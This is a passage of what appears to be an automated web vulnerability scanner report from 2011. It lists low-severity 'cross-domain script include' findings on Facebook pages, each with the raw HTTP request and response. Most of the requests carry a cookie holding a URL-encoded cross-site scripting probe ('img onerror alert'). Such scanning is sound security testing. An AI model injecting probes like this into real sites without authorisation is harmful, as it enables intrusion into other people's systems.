<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.60. http://www.facebook.com/pages/HMFIC/149403761740008

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HMFIC/149403761740008

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/HMFIC/149403761740008 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.83
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 26855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.61. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Manchester-Connecticut/112527912096312

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Manchester-Connecticut/112527912096312 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.35
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 41389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.62. http://www.facebook.com/pages/Merchandiser/123981654314779

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Merchandiser/123981654314779

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Merchandiser/123981654314779 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.41
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 26925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.63. http://www.facebook.com/pages/New-Haven-College/130105783687523

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/New-Haven-College/130105783687523

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/New-Haven-College/130105783687523 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.61
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 26979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.64. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Northern-Illinois-University/108155335871674

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Northern-Illinois-University/108155335871674 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.57
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.65. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/San-Antonio-Texas/110297742331680

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/San-Antonio-Texas/110297742331680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.69
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 39429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.66. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/School-of-Hard-Knocks-University-of-Life/115228431825707 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.39
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.67. http://www.facebook.com/pages/Sporting-News/104068362964496

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Sporting-News/104068362964496

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/Sporting-News/104068362964496 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.135.73
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.68. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.37
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 47298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.69. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/University-of-Chicago-Semester-in-Madrid/144554762263161 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.159.71
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.70. http://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.71. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /pages/memorial-high-school-west-new-york-nj/114508558584580 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.53
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 27189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.72. http://www.facebook.com/patroyo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /patroyo

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /patroyo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.73. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
